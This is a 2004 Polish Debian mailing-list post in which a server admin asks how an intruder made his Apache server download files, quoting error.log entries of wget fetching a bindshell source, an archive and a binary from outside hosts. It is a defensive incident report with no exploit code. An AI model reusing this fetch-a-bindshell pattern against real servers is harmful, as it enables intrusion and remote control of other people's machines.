[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: debian stable, apache i http://geocities.com/s3xmelayu/bindtty.c

Dnia wto 17. lutego 2004 09:30, Marcin Owsiany napisał:
> On Mon, Feb 16, 2004 at 01:01:28PM +0100, Krzysztof Jóźwiak wrote:
> > Właśnie dzisiaj ktoś próbował dobrać się do mojego serwera www
> > (stabilny debian, serwer apache z paczki).
> >
> > przez coś takiego: http://geocities.com/s3xmelayu/bindtty.c,
>
> To nie jest sposób na "dobieranie się". To jest bindshell, czyli taki
> serwer telneta, który nie pyta o hasło :-)
to sie domyslilem, 

> Włamywacze instalują sobie takie zabawki (i często masę innych) żeby po
> włamie móc sobie wygodnie wchodzić na maszynę.

No i wyjdzie ze dupa ze mnie nie admin bo nie wiem jak koleś zmusił mojego 
apache do ściagania rzeczy. No chyba ze poniższe logi nie świadczą o tym ze 
zrobił to apache. 
W logach apache mam coś takiego (error.log):

[Sun Feb 15 05:25:14 2004] [notice] Apache/1.3.26 (Unix) Debian GNU/Linux 
PHP/4.1.2 configured -- resuming normal operations
[Sun Feb 15 05:25:14 2004] [notice] suEXEC mechanism enabled (wrapper: 
/usr/lib/apache/suexec)
[Sun Feb 15 05:25:14 2004] [notice] Accept mutex: sysvsem (Default: sysvsem)
--06:19:22--  http://geocities.com/s3xmelayu/bindtty.c
           => `bindtty.c'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5,394 [text/plain]

    0K .....                                                 100%   26.74 KB/s

06:19:23 (26.74 KB/s) - `bindtty.c' saved [5394/5394]

bind: Address already in use

i dalej:

[Mon Feb 16 13:26:42 2004] [notice] Accept mutex: sysvsem (Default: sysvsem)
--20:38:25--  http://aleksrulz.com/amech.tgz
           => `amech.tgz'
Resolving aleksrulz.com... done.
Connecting to aleksrulz.com[66.218.79.182]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 379,849 [application/x-compressed]

    0K .......... .......... .......... .......... .......... 13%   47.17 KB/s
   50K .......... .......... .......... .......... .......... 26%   59.38 KB/s
  100K .......... .......... .......... .......... .......... 40%   60.02 KB/s
  150K .......... .......... .......... .......... .......... 53%   73.42 KB/s
  200K .......... .......... .......... .......... .......... 67%   72.67 KB/s
  250K .......... .......... .......... .......... .......... 80%   69.16 KB/s
  300K .......... .......... .......... .......... .......... 94%   68.68 KB/s
  350K .......... ..........                                 100%   65.25 KB/s

20:38:31 (63.13 KB/s) - `amech.tgz' saved [379849/379849]

--22:00:34--  http://maniaku157.locaweb.com.br/httpd
           => `httpd.1'
Resolving maniaku157.locaweb.com.br... done.
Connecting to maniaku157.locaweb.com.br[200.246.179.116]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
22:00:35 ERROR 404: Not Found.

--22:05:33--  http://maniaku157.locaweb.com.br/httpd
           => `httpd.1'
Resolving maniaku157.locaweb.com.br... done.


> BTW odpalić ten programik może każdy user, nie musi się włamywać.

no ale musi miec shella, no chyba ze ftpem tez podłoży...


dalej podejrzewam ze jest to pewnie zle skonfigurowany apache (albo nie daj 
boze dziurawy)...

> Marcin
> --
> Marcin Owsiany <porridge@debian.org>             http://marcin.owsiany.pl/
> GnuPG: 1024D/60F41216  FE67 DA2D 0ACA FC5E 3F75  D6F6 3A0D 8AA0 60F4 1216

-- 
Pozdrawiam	
	Krzysztof Jóźwiak
Reply to: